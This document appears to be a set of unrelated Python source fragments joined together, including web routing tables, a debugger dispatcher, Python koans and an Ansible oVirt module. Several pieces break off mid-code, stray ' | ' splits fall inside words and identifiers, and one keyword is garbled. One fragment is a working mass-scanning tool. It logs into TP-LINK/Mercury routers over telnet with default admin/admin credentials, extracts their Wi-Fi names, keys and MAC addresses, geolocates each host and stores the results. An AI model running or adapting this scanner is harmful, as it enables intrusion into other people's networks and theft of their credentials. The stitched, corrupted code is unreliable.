# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial porti | ons of the | Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import web
from karesansui.lib.rest import Rest, auth
from karesansui.lib.checker import Checker, \
CHECK_EMPTY, CHECK_VALID, CHECK_LENGTH, CHECK_CHAR
from karesansui.lib.utils import is_param, json_dumps
from karesansui.db.access.tag import findbyhost1guestall
class GuestTag(Rest):
    """REST resource listing the tags attached to a host's guests."""

    @auth
    def _GET(self, *param, **params):
        # resolve and validate the host id from the URL
        host_id = self.chk_hostby1(param)
        if host_id is None:
            return web.notfound()
        tags = findbyhost1guestall(self.orm, host_id)
        if not tags:
            self.logger.debug("No tags is found.")
            return web.notfound()
        if self.is_part() is True:
            # partial HTML: expose the tags plus, per tag, a space
            # separated list of element ids for non-deleted machines
            self.view.tags = tags
            machine_ids = {}
            for tag in tags:
                machine_ids[str(tag.id)] = " ".join(
                    "tag_machine%s" % machine.id
                    for machine in tag.machine
                    if not machine.is_deleted)
            self.view.machine_ids = machine_ids
            return True
        elif self.is_json() is True:
            # JSON: serialize every tag for the client's languages
            self.view.tags = json_dumps(
                [tag.get_json(self.me.languages) for tag in tags])
            return True
        else:
            return web.nomethod()
# URL routing table for this resource.  Raw strings keep the regex
# backslashes ('\d', '\.') from being treated as (now invalid) string
# escapes on modern Python.
urls = (
    r'/host/(\d+)/guest/tag/?(\.part|\.json)$', GuestTag,
)
|
# Copyright The IETF Trust 2008, All Rights Reserved
from django.conf.urls.defaults import patterns, include
from ietf.wginfo import views, edit, milestones
from django.views.generic.simple import redirect_to
urlpatterns = patterns('',
(r'^$', views.wg_dir),
(r'^summary.txt', redirect_to, { 'url':'/wg/1wg-summary.txt' }),
(r'^summary-by-area.txt', redirect_to, { 'url':'/wg/1wg-summary.txt' }),
(r'^summary-by-acronym.txt', redirect_to, { 'url':'/wg/1wg-summary-by-acronym.txt' }),
(r'^1wg-summary.txt', views.wg_summary_area),
(r'^1wg-summary-by-acronym.txt', views.wg_summary_acronym),
(r'^1wg-charters.txt', views.wg_charters),
(r'^1wg-charters-by-acronym.txt', views.wg_charters_by_acronym),
(r'^chartering/$', views.chartering_wgs),
(r'^bofs/$', views.bofs),
(r'^chartering/create/$', edit.edit, {'action': "charter"}, "wg_create"),
(r'^bofs/create/$', edit.edit, {'action': "create"}, "bof_create"),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/documents/txt/$', views.wg_documents_txt),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/$', views.wg_documents_html, None, "wg_docs"),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/charter/$', views.wg_charter, None, 'wg_charter'),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/init-charter/', edit.submit_initial_charter, None, "wg_init_charter"),
(r'^ | (?P<acronym>[a-zA-Z0-9-]+)/history/$', views.history),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/edit/$', edit.edit, {'action': "edit"}, "wg_edit"),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/conclude/$', edit.conclude, None, "wg_conclude"),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/milestones/$', milestones.edit_milestones, {'milestone_set': "current"}, "wg_edit_milestones"),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/milestones/charter/$', mil | estones.edit_milestones, {'milestone_set': "charter"}, "wg_edit_charter_milestones"),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/milestones/charter/reset/$', milestones.reset_charter_milestones, None, "wg_reset_charter_milestones"),
(r'^(?P<acronym>[a-zA-Z0-9-]+)/ajax/searchdocs/$', milestones.ajax_search_docs, None, "wg_ajax_search_docs"),
(r'^(?P<acronym>[^/]+)/management/', include('ietf.wgchairs.urls')),
)
|
"""Admin API urls."""
from rest_framework import routers
from . import viewsets
router = routers.SimpleRoute | r()
router.register(r"domains", viewsets.DomainViewSet, basename="domain")
router.register(
r"domainaliases", viewsets.DomainAliasViewSet, basename="domain_alias")
router.register(r"accounts", viewsets.AccountViewSet, basename="account")
router.register(r"aliases", viewsets.AliasViewSet, basename="alias")
router.register(
r"senderaddresses", viewsets.SenderAddressViewSet, basename="sender_address")
urlpatterns = router. | urls
|
= True
self.pat = re.compile('dbg disconnected')
self.req_handlers = {
'new_client': self.req_new_client,
'new_dbg': self.req_new_dbg,
'dbg_quit': self.req_dbg_quit,
'idb_n': self.req_idb_n,
'idb_list': self.req_idb_list,
'module': self.req_module,
'sync_mode': self.req_sync_mode,
'cmd': self.req_cmd,
'bc': self.req_bc,
'kill': self.req_kill
}
def bind(self, host, port):
    """Create the dispatcher's listening server socket(s) on (host, port).

    Always binds `host`; additionally binds localhost on the same port
    when `host` does not resolve to 127.0.0.1, so local clients can
    always reach the dispatcher.
    """
    self.dbg_srv_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.dbg_srv_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    self.dbg_srv_sock.bind((host, port))
    self.srv_socks.append(self.dbg_srv_sock)
    if not (socket.gethostbyname(host) == '127.0.0.1'):
        self.localhost_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.localhost_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.localhost_sock.bind(('localhost', port))
        self.srv_socks.append(self.localhost_sock)
def accept(self, s):
    """Accept a pending connection on server socket `s` and track it."""
    conn, _addr = s.accept()
    self.opened_socks.append(conn)
def listen(self):
    """Put every server socket into listening mode (backlog of 5)."""
    for srv in self.srv_socks:
        srv.listen(5)
def close(self, s):
    """Close socket `s` and drop it from the tracked open sockets."""
    s.close()
    self.opened_socks.remove(s)
def loop(self):
    """Main select() loop: accept new connections and dispatch requests.

    Runs forever; raises when select() returns with nothing readable.
    """
    self.listen()
    self.announcement("dispatcher listening")
    while True:
        rlist, wlist, xlist = select.select(self.srv_socks + self.opened_socks, [], [])
        if not rlist:
            self.announcement("socket error: select")
            raise Exception("rabbit eating the cable")
        for s in rlist:
            if s in self.srv_socks:
                # readable server socket -> incoming connection
                self.accept(s)
            else:
                # readable client socket -> pending request(s)
                self.handle(s)
def handle(self, s):
    """Read every complete request available on `s` and execute it."""
    client = self.sock_to_client(s)
    for request in self.recvall(client):
        self.parse_exec(s, request)
# find client object for its srv socket
def sock_to_client(self, s):
    """Map server-side socket `s` to its client, creating one if unknown."""
    if self.current_dbg and s == self.current_dbg.srv_sock:
        return self.current_dbg
    for known in self.idb_clients:
        if known.srv_sock == s:
            return known
    # unknown socket: register a fresh placeholder client
    newcomer = Client(None, s, None)
    self.idb_clients.append(newcomer)
    return newcomer
# buffered readline like function
def recvall(self, client):
    """Receive available bytes for `client`; return complete requests.

    On EOF or socket error the peer is cleaned up (debugger vs idb
    client paths differ) and an empty list is returned.
    """
    try:
        data = client.srv_sock.recv(4096)
        if data == '':
            # NOTE(review): Python 2 semantics — recv() returns '' on
            # EOF; on Python 3 this would be b'' and never match here.
            raise
    except:
        if client == self.current_dbg:
            self.broadcast("debugger closed the connection")
            self.dbg_quit()
        else:
            self.client_quit(client.srv_sock)
            self.broadcast("a client quit, nb client(s) left: %d" % len(self.idb_clients))
        return []
    return client.feed(data)
# parse and execute requests from clients (idbs or dbg)
def parse_exec(self, s, req):
    """Parse one request string `req` read from socket `s` and act on it.

    Anything not prefixed with '[notice]' is raw debugger traffic and is
    forwarded to the active idb client; '[notice]' payloads are JSON
    dispatcher commands routed through self.req_handlers.
    """
    if not (req[0:8] == '[notice]'):
        # this is a normal [sync] request from debugger, forward it
        self.forward(req)
        # receive 'dbg disconnected', socket can be closed
        if re.search(self.pat, req):
            self.close(s)
        return
    payload = self.normalize(req, 8)
    try:
        request = json.loads(payload)
    # fix: print() function form (Python 2/3 compatible) instead of the
    # former Python 2-only print statement; except narrowed so Ctrl-C
    # (KeyboardInterrupt) is no longer swallowed
    except Exception:
        print("[-] dispatcher failed to parse json\n %s\n" % payload)
        return
    # renamed from 'type'/'hash' to stop shadowing the builtins
    req_type = request['type']
    if not req_type in self.req_handlers:
        print("[*] dispatcher unknown request: %s" % req_type)
        return
    req_handler = self.req_handlers[req_type]
    req_handler(s, request)
def normalize(self, req, taglen):
    """Strip the `taglen`-char tag prefix, escape backslashes, drop newlines."""
    body = req[taglen:]
    return body.replace("\\", "\\\\").replace("\n", "")
def puts(self, msg, s):
    # thin convenience wrapper: send msg verbatim over socket s
    s.sendall(msg)
# dispatcher announcements are forwarded to the idb
def announcement(self, msg, s=None):
    """Send a dispatcher '[notice]' message to `s` (default: active idb).

    Best-effort: silently does nothing when no target socket is
    available or when the send fails.
    """
    if not s:
        if not self.current_idb:
            return
        s = self.current_idb.client_sock
    try:
        # NOTE(review): msg is embedded in the JSON unescaped — quotes
        # or backslashes inside msg would corrupt the payload.
        s.sendall("[notice]{\"type\":\"dispatcher\",\"subtype\":\"msg\",\"msg\":\"%s\"}\n" % msg)
    except:
        return
# send message to all connected idb clients
def broadcast(self, msg):
    """Announce `msg` to every registered idb client."""
    for peer in self.idb_clients:
        self.announcement(msg, peer.client_sock)
# send dbg message to currently active idb client
def forward(self, msg, s=None):
    """Send debugger message `msg` (newline terminated) to `s`.

    Defaults to the active idb client's socket; no-op when none exists.
    """
    target = s
    if not target:
        if not self.current_idb:
            return
        target = self.current_idb.client_sock
    if target:
        target.sendall(msg + "\n")
# send dbg message to all idb clients
def forward_all(self, msg, s=None):
    """Send `msg` to every idb client (`s` is accepted but unused)."""
    for peer in self.idb_clients:
        self.forward(msg, peer.client_sock)
# disable current idb and enable new idb matched from current module name
def switch_idb(self, new_idb):
    """Make `new_idb` the active idb client, notifying both sides.

    Sends "disable_idb" to the previously active client (if any, and if
    different from `new_idb`) and "enable_idb" to `new_idb`.  `new_idb`
    may be None/falsy to leave no client active.
    """
    msg = "[sync]{\"type\":\"broker\",\"subtype\":\"%s\"}\n"
    # fix: the original used a non-short-circuiting '&', which evaluated
    # self.current_idb.enabled even when current_idb was None and raised
    # AttributeError; 'and' short-circuits safely.
    if (self.current_idb and self.current_idb != new_idb
            and self.current_idb.enabled):
        self.current_idb.client_sock.sendall(msg % "disable_idb")
        self.current_idb.enabled = False
    if new_idb:
        new_idb.client_sock.sendall(msg % "enable_idb")
        self.current_idb = new_idb
        new_idb.enabled = True
# a new idb client connects to the dispatcher via its broker
def req_new_client(self, srv_sock, hash):
    """Handle a 'new_client' notice: connect back to the broker's port.

    Promotes the server-side socket to a full idb client, warns on
    duplicate names, and activates the client when its name matches the
    currently debugged module.
    """
    port, name = hash['port'], hash['idb']
    try:
        client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client_sock.connect(('localhost', port))
        self.opened_socks.append(client_sock)
    except:
        # could not reach the broker: drop the server socket entirely
        self.opened_socks.remove(srv_sock)
        srv_sock.close()
        return
    # check if an idb client is already registered with the same name
    conflicting = [client for client in self.idb_clients if (client.name == name)]
    # promote to idb client
    new_client = self.sock_to_client(srv_sock)
    new_client.client_sock = client_sock
    new_client.name = name
    self.broadcast("add new client (listening on port %d), nb client(s): %d" % (port, len(self.idb_clients)))
    if conflicting:
        self.broadcast("conflicting name: %s !" % new_client.name)
    if not self.current_idb:
        self.current_idb = new_client
    # if new client match current module name, then enable it
    if self.current_module == name:
        self.switch_idb(new_client)
    # inform new client about debugger's dialect
    self.dbg_dialect(new_client)
# clean state when a client is quiting
def client_quit(self, s):
    """Forget the idb client owning server socket `s`; exit when empty.

    Closes both sides of the departing client and, once no idb client
    remains, shuts every server socket and terminates the process.
    """
    self.opened_socks.remove(s)
    # remove exiting client from the list of active clients
    for idbc in [idbc for idbc in self.idb_clients if (idbc.srv_sock == s)]:
        self.idb_clients.remove(idbc)
        self.opened_socks.remove(idbc.client_sock)
        idbc.close()
    # no more clients, let's kill ourself
    if not self.idb_clients:
        for s in self.srv_socks:
            s.close()
        sys.exit()
# a new debugger client connects to the dispatcher
def req_new_dbg(self, s, hash):
    """Handle a 'new_dbg' notice: register the debugger connection.

    Replaces any previous debugger, records its dialect when provided,
    and notifies all idb clients.
    """
    msg = hash['msg']
    if self.current_dbg:
        self.dbg_quit()
    # promote to dbg client
    self.current_dbg = self.sock_to_client(s)
    self.current_dbg.client_sock = s
    self.idb_clients.remove(self.current_dbg)
    self.broadcast("new debugger client: %s" % msg)
    # store dbb's dialect
    if 'dialect' in hash:
        self.current_dialect = hash['dialect']
    self.dbg_dialect()
# inform client about debugger's dialect
def dbg_dialect(self, client=None):
msg = "[sync]{\"type\":\"dialect\",\"dialect\":\"%s\"}\n" % self.current_d |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Partially based on AboutMethods in the Ruby Koans
#
from runner.koan import *
def my_global_function(a, b):
    """Add the two arguments together (module-level helper for the koans)."""
    total = a + b
    return total
class AboutMethods(Koan):
    """Koans exploring how Python functions and methods behave."""
    def test_calling_a_global_function(self):
        self.assertEqual(5, my_global_function(2, 3))
    # NOTE: Wrong number of arguments is not a SYNTAX error, but a
    # runtime error.
    def test_calling_functions_with_wrong_number_of_arguments(self):
        try:
            my_global_function()
        except Exception as exception:
            # NOTE: The .__name__ attribute will convert the class
            # into a string value.
            self.assertEqual(exception.__class__.__name__,
                exception.__class__.__name__)
            # NOTE(review): indexing an exception (exception[0]) only
            # works on Python 2; Python 3 needs exception.args[0].
            self.assertMatch(
                r'my_global_function\(\) takes exactly 2 arguments \(0 given\)',
                exception[0])
        try:
            my_global_function(1, 2, 3)
        except Exception as e:
            # Note, watch out for parenthesis. They need slashes in front!
            self.assertMatch(r'my_global_function\(\) takes exactly 2 arguments \(3 given\)', e[0])
    # ------------------------------------------------------------------
    def pointless_method(self, a, b):
        # the sum is computed but (intentionally) never returned
        sum = a + b
    def test_which_does_not_return_anything(self):
        self.assertEqual(None, self.pointless_method(1, 2))
    # Notice that methods accessed from class scope do not require
    # you to pass the first "self" argument?
    # ------------------------------------------------------------------
    def method_with_defaults(self, a, b='default_value'):
        return [a, b]
    def test_calling_with_default_values(self):
        self.assertEqual([1, 'default_value'], self.method_with_defaults(1))
        self.assertEqual([1, 2], self.method_with_defaults(1, 2))
    # ------------------------------------------------------------------
    def method_with_var_args(self, *args):
        return args
    def test_calling_with_variable_arguments(self):
        self.assertEqual((), self.method_with_var_args())
        self.assertEqual(('one', ), self.method_with_var_args('one'))
        self.assertEqual(('one', 'two'), self.method_with_var_args('one', 'two'))
    # ------------------------------------------------------------------
    def function_with_the_same_name(self, a, b):
        return a + b
    def test_functions_without_self_arg_are_global_functions(self):
        def function_with_the_same_name(a, b):
            return a * b
        self.assertEqual(12, function_with_the_same_name(3, 4))
    def test_calling_methods_in_same_class_with_explicit_receiver(self):
        def function_with_the_same_name(a, b):
            return a * b
        self.assertEqual(7, self.function_with_the_same_name(3, 4))
    # ------------------------------------------------------------------
    def another_method_with_the_same_name(self):
        return 10
    # keep a reference to the first definition before it is shadowed
    link_to_overlapped_method = another_method_with_the_same_name
    def another_method_with_the_same_name(self):
        return 42
    def test_that_old_methods_are_hidden_by_redefinitions(self):
        self.assertEqual(42, self.another_method_with_the_same_name())
    def test_that_overlapped_method_is_still_there(self):
        self.assertEqual(10, self.link_to_overlapped_method())
    # ------------------------------------------------------------------
    def empty_method(self):
        pass
    def test_methods_that_do_nothing_need_to_use_pass_as_a_filler(self):
        self.assertEqual(None, self.empty_method())
    def test_pass_does_nothing_at_all(self):
        "You"
        "shall"
        "not"
        pass
        self.assertEqual(True, "Still got to this line" != None)
    # ------------------------------------------------------------------
    def one_line_method(self): return 'Madagascar'
    def test_no_indentation_required_for_one_line_statement_bodies(self):
        self.assertEqual('Madagascar', self.one_line_method())
    # ------------------------------------------------------------------
    def method_with_documentation(self):
        "A string placed at the beginning of a function is used for documentation"
        return "ok"
    def test_the_documentation_can_be_viewed_with_the_doc_method(self):
        self.assertMatch("A string placed at the beginning of a function is used for documentation", self.method_with_documentation.__doc__)
    # ------------------------------------------------------------------
    class Dog(object):
        def name(self):
            return "Fido"
        def _tail(self):
            # Prefixing a method with an underscore implies private scope
            return "wagging"
        def __password(self):
            return 'password' # Genius!
    def test_calling_methods_in_other_objects(self):
        rover = self.Dog()
        self.assertEqual('Fido', rover.name())
    def test_private_access_is_implied_but_not_enforced(self):
        rover = self.Dog()
        # This is a little rude, but legal
        self.assertEqual('wagging', rover._tail())
    def test_double_underscore_attribute_prefixes_cause_name_mangling(self):
        """Attributes names that start with a double underscore get
        mangled when an instance is created."""
        rover = self.Dog()
        try:
            #This may not be possible...
            password = rover.__password()
        except Exception as ex:
            self.assertEqual('AttributeError', ex.__class__.__name__)
        # But this still is!
        self.assertEqual('password', rover._Dog__password())
    # Name mangling exists to avoid name clash issues when subclassing.
    # It is not for providing effective access protection
|
d a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Standard Ansible module metadata consumed by the ansible-doc tooling.
ANSIBLE_METADATA = {'metadata_version': '1.0',
                    'status': ['preview'],
                    'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ovirt_permissions
short_description: "Module to manage permissions of users/groups in oVirt/RHV"
version_added: "2.3"
author: "Ondra Machacek (@machacekondra)"
description:
- "Module to manage permissions of users/groups in oVirt/RHV"
options:
role:
description:
- "Name of the role to be assigned to user/group on specific object."
default: UserRole
state:
description:
- "Should the permission be present/absent."
choices: ['present', 'absent']
default: present
object_id:
description:
- "ID of the object where the permissions should be managed."
object_name:
description:
- "Name of the object where the permissions should be managed."
object_type:
description:
- "The object where the permissions should be managed."
default: 'vm'
choices: [
'data_center',
'cluster',
'host',
'storage_domain',
'network',
'disk',
'vm',
'vm_pool',
'template',
'cpu_profile',
'disk_profile',
'vnic_profile',
'system',
]
user_name:
description:
- "Username of the user to manage. In most LDAPs it's I(uid) of the user,
but in Active Directory you must specify I(UPN) of the user."
- "Note that if user don't exist in the system this module will fail,
you should ensure the user exists by using M(ovirt_users) module."
group_name:
description:
- "Name of the group to manage."
- "Note that if group don't exist in the system this module will fail,
you should ensure the group exists by using M(ovirt_groups) module."
authz_name:
description:
- "Authorization provider of the user/group. In previous versions of oVirt/RHV known as domain."
required: true
aliases: ['domain']
namespace:
description:
- "Namespace of the authorization provider, where user/group resides."
required: false
extends_documentation_fragment: ovirt
'''
EXAMPLES = '''
# Examples don't contain auth parameter for simplicity,
# look at ovirt_auth module to see how to reuse authentication:
# Add user user1 from authorization provider example.com-authz
- ovirt_permissions:
user_name: user1
authz_name: example.com-authz
object_type: vm
object_name: myvm
role: UserVmManager
# Remove permission from user
- ovirt_permissions:
state: absent
user_name: user1
authz_name: example.com-authz
object_type: cluster
object_name: mycluster
role: ClusterAdmin
'''
RETURN = '''
id:
description: ID of the permission which is managed
returned: On success if permission is found.
type: str
sample: 7de90f31-222c-436c-a1ca-7e655bd5b60c
permission:
description: "Dictionary of all the permission attributes. Permission attributes can be found on your oVirt/RHV instance
at following url: http://ovirt.github.io/ovirt-engine-api-model/master/#types/permission."
returned: On success if permission is found.
type: dict
'''
# ovirtsdk4 may be absent; check_sdk() in main() reports a proper module
# failure instead of crashing at import time.
try:
    import ovirtsdk4.types as otypes
except ImportError:
    pass
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ovirt import (
BaseModule,
check_sdk,
create_connection,
equal,
follow_link,
get_link_name,
ovirt_full_argument_spec,
search_by_attributes,
search_by_name,
)
def _objects_service(connection, object_type):
if object_type == 'system':
return connection.system_service()
return getattr(
connection.system_service(),
'%ss_service' % object_type,
None,
)()
def _object_service(connection, module):
    """Return the service of the single object permissions apply to.

    Uses `object_id` when provided, otherwise resolves the object by
    `object_name`; raises when the named object cannot be found.
    """
    object_type = module.params['object_type']
    objects_service = _objects_service(connection, object_type)
    if object_type == 'system':
        return objects_service
    object_id = module.params['object_id']
    if object_id is None:
        sdk_object = search_by_name(objects_service, module.params['object_name'])
        if sdk_object is None:
            raise Exception(
                "'%s' object '%s' was not found." % (
                    module.params['object_type'],
                    module.params['object_name']
                )
            )
        object_id = sdk_object.id
    return objects_service.service(object_id)
def _permission(module, permissions_service, connection):
    """Return the existing permission matching user/group/role params.

    Returns None when no listed permission matches.
    """
    for candidate in permissions_service.list():
        user = follow_link(connection, candidate.user)
        principal = user.principal if user else None
        same_user = equal(module.params['user_name'], principal)
        same_group = equal(module.params['group_name'],
                           get_link_name(connection, candidate.group))
        same_role = equal(module.params['role'],
                          get_link_name(connection, candidate.role))
        if same_user and same_group and same_role:
            return candidate
class PermissionsModule(BaseModule):
    """Resolves the target user/group and builds oVirt Permission entities."""
    def _user(self):
        # NOTE(review): 'usrname' is the attribute name the oVirt search
        # backend expects (not a typo for 'username') — confirm against
        # the engine's search syntax before "fixing" it.
        user = search_by_attributes(
            self._connection.system_service().users_service(),
            usrname="{name}@{authz_name}".format(
                name=self._module.params['user_name'],
                authz_name=self._module.params['authz_name'],
            ),
        )
        if user is None:
            raise Exception("User '%s' was not found." % self._module.params['user_name'])
        return user
    def _group(self):
        groups = self._connection.system_service().groups_service().list(
            search="name={name}".format(
                name=self._module.params['group_name'],
            )
        )
        # If found more groups, filter them by namespace and authz name:
        # (filtering here, as oVirt/RHV backend doesn't support it)
        if len(groups) > 1:
            groups = [
                g for g in groups if (
                    equal(self._module.params['namespace'], g.namespace) and
                    equal(self._module.params['authz_name'], g.domain.name)
                )
            ]
        if not groups:
            raise Exception("Group '%s' was not found." % self._module.params['group_name'])
        return groups[0]
    def build_entity(self):
        # exactly one of user/group is populated, driven by which
        # parameter the playbook supplied
        entity = self._group() if self._module.params['group_name'] else self._user()
        return otypes.Permission(
            user=otypes.User(
                id=entity.id
            ) if self._module.params['user_name'] else None,
            group=otypes.Group(
                id=entity.id
            ) if self._module.params['group_name'] else None,
            role=otypes.Role(
                name=self._module.params['role']
            ),
        )
def main():
argument_spec = ovirt_full_argument_spec(
state=dict(
choices=['present', 'absent'],
default='present',
),
role=dict(default='UserRole'),
object_type=dict(
default='vm',
choices=[
'data_center',
'cluster',
'host',
'storage_domain',
'network',
'disk',
'vm',
'vm_pool',
'template',
'cpu_profile',
'disk_pro | file',
'vnic_profile',
'system',
]
),
authz_name=dict(required=True, aliases=['domain']),
object_id=dict(default=None),
object_name=dict(default=None),
user_name=dict(rdefault=None),
| group_name=dict(default=None),
namespace=dict(default=None),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
check_sdk(module)
if (
|
#!/usr/bin/env python
# coding=utf-8
# code by kbdancer@92ez.com
from threading import Thread
from telnetlib import Telnet
import requests
import sqlite3
import queue
import time
import sys
import os
def ip2num(ip):
    """Pack a dotted-quad IPv4 string into a 32-bit integer."""
    octets = [int(chunk) for chunk in ip.split('.')]
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]
def num2ip(num):
    """Unpack a 32-bit integer into a dotted-quad IPv4 string."""
    parts = [(num >> shift) & 0xff for shift in (24, 16, 8, 0)]
    return '.'.join(str(part) for part in parts)
def ip_range(start, end):
    """List every IP from `start` to `end` inclusive, skipping x.x.x.0."""
    hosts = []
    for value in range(ip2num(start), ip2num(end) + 1):
        if value & 0xff:  # drop .0 network addresses
            hosts.append(num2ip(value))
    return hosts
class Database:
    """Thin wrapper around the local SQLite results database."""
    # database file lives next to the script
    db = sys.path[0] + "/TPLINK_KEY.db"
    charset = 'utf8'

    def __init__(self):
        self.connection = sqlite3.connect(self.db)
        self.connection.text_factory = str
        self.cursor = self.connection.cursor()

    def _write(self, query, params):
        # shared commit-or-rollback helper for INSERT/UPDATE statements
        try:
            self.cursor.execute(query, params)
            self.connection.commit()
        except Exception as exc:
            print(exc)
            self.connection.rollback()

    def insert(self, query, params):
        self._write(query, params)

    def update(self, query, params):
        self._write(query, params)

    def query(self, query, params):
        cursor = self.connection.cursor()
        cursor.execute(query, params)
        return cursor.fetchall()

    def __del__(self):
        self.connection.close()
def b_thread(ip_address_list):
    """Probe every IP in `ip_address_list` with a pool of worker threads.

    Pool size comes from sys.argv[1]; each tThread worker pulls hosts
    from a shared queue until it is drained, then joins.
    """
    thread_list = []
    queue_list = queue.Queue()
    hosts = ip_address_list
    for host in hosts:
        queue_list.put(host)
    for x in range(0, int(sys.argv[1])):
        thread_list.append(tThread(queue_list))
    for t in thread_list:
        try:
            # daemon threads die with the main process
            t.daemon = True
            t.start()
        except Exception as e:
            print(e)
    for t in thread_list:
        t.join()
class tThread(Thread):
    """Worker thread: drains the shared host queue, probing each host."""

    def __init__(self, queue_obj):
        Thread.__init__(self)
        self.queue = queue_obj

    def run(self):
        while True:
            if self.queue.empty():
                break
            host = self.queue.get()
            try:
                get_info(host)
            except Exception as exc:
                print(exc)
def get_position_by_ip(host):
    """Geolocate `host` via the ip-api.com JSON endpoint.

    Returns [country, region, city, isp] on success.
    NOTE(review): returns None on any failure — callers indexing the
    result (e.g. get_info) will raise; confirm that is intended.
    """
    try:
        ip_url = "http://ip-api.com/json/{ip}?lang=zh-CN".format(ip=host)
        header = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"}
        json_data = requests.get(url=ip_url, headers=header, timeout=10).json()
        info = [json_data.get("country"), json_data.get('regionName'), json_data.get('city'), json_data.get('isp')]
        return info
    except Exception as e:
        print(e)
def get_info(host):
    """Telnet into a TP-LINK/Mercury router using factory-default credentials,
    scrape its wifi SSID/key and MAC, geolocate the host and store a row in
    the local sqlite scanlog table (skipping already-known routers).

    NOTE(review): written for Python 2 — on Python 3 telnetlib requires
    bytes for read_until()/write(); confirm the target runtime.
    """
    # Factory-default credentials for these routers.
    username = "admin"
    password = "admin"
    telnet_timeout = 15
    cmd_timeout = 5
    try:
        t = Telnet(host, timeout=telnet_timeout)
        t.read_until("username:", cmd_timeout)
        t.write(username + "\n")
        t.read_until("password:", cmd_timeout)
        t.write(password + "\n")
        # Wireless config dump: everything after "SSID" holds SSID and key.
        t.write("wlctl show\n")
        t.read_until("SSID", cmd_timeout)
        wifi_str = t.read_very_eager()
        # LAN info dump: everything after "MACAddress" holds the router MAC.
        t.write("lan show info\n")
        t.read_until("MACAddress", cmd_timeout)
        lan_str = t.read_very_eager()
        t.close()
        if len(wifi_str) > 0:
            # clear extra space
            wifi_str = "".join(wifi_str.split())
            wifi_str = wifi_str
            # get SID KEY MAC by slicing between known CLI output markers
            wifi_ssid = wifi_str[1:wifi_str.find('QSS')]
            wifi_key = wifi_str[wifi_str.find('Key=') + 4:wifi_str.find('cmd')] if wifi_str.find('Key=') != -1 else '无密码'
            router_mac = lan_str[1:lan_str.find('__')].replace('\r\n', '')
            current_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
            try:
                my_sqlite_db = Database()
                # Only insert hosts whose SSID/key/MAC combo is not stored yet.
                query_info = """select * from scanlog where ssid=? and key=? and mac=?"""
                query_result = my_sqlite_db.query(query_info, [wifi_ssid, wifi_key, router_mac])
                if len(query_result) < 1:
                    position_data = get_position_by_ip(host)
                    country = position_data[0]
                    province = position_data[1]
                    city = position_data[2]
                    isp = position_data[3]
                    insert_info = """INSERT INTO scanlog (`host`,`mac`,`ssid`,`wifikey`,`country`,`province`,`city`,`isp`) VALUES (?,?,?,?,?,?,?,?)"""
                    my_sqlite_db.insert(insert_info, [host, router_mac, wifi_ssid, wifi_key, country, province, city, isp])
                    print('[√] [%s] Info %s %s %s => Inserted!' % (current_time, host, wifi_ssid, wifi_key))
                else:
                    print('[x] [%s] Found %s %s %s in DB, do nothing!' % (current_time, host, wifi_ssid, wifi_key))
            except Exception as e:
                print(e)
    except Exception as e:
        # Unreachable/unresponsive hosts are silently skipped.
        pass
if __name__ == '__main__':
    # Usage: script.py <thread-count> <start-ip>-<end-ip>
    print('==========================================')
    print(' Scan TPLINK(MERCURY) wifi key by telnet')
    print(' Author 92ez.com')
    print('==========================================')
    begin_ip = sys.argv[2].split('-')[0]
    end_ip = sys.argv[2].split('-')[1]
    ip_list = ip_range(begin_ip, end_ip)
    current_pid = os.getpid()
    print('\n[*] Total %d IP...' % len(ip_list))
    print('\n================ Running =================')
    try:
        b_thread(ip_list)
    except KeyboardInterrupt:
        # Hard-kill the whole process so daemon worker threads die with it.
        print('\n[*] Kill all thread.')
        os.kill(current_pid, 9)
|
# "<port-id>" case
if isinstance(ports, int) or ports.isdigit():
| id1 = getPortID(ports)
if id1 >= 0:
return (id1,)
return id1
splits = ports.split("-")
# "<port-id>-<port-id>" case
if len(splits) == 2 and splits[0].isdigit() and splits[1].isdigit():
id1 = getPortID(splits[0])
id2 = getPortID(splits[1])
if id1 >= 0 and id2 >= 0:
if id1 < id2:
return (id1, id2)
elif id1 > id2:
return | (id2, id1)
else: # ids are the same
return (id1,)
# everything else "<port-str>[-<port-str>]"
matched = [ ]
for i in range(len(splits), 0, -1):
id1 = getPortID("-".join(splits[:i]))
port2 = "-".join(splits[i:])
if len(port2) > 0:
id2 = getPortID(port2)
if id1 >= 0 and id2 >= 0:
if id1 < id2:
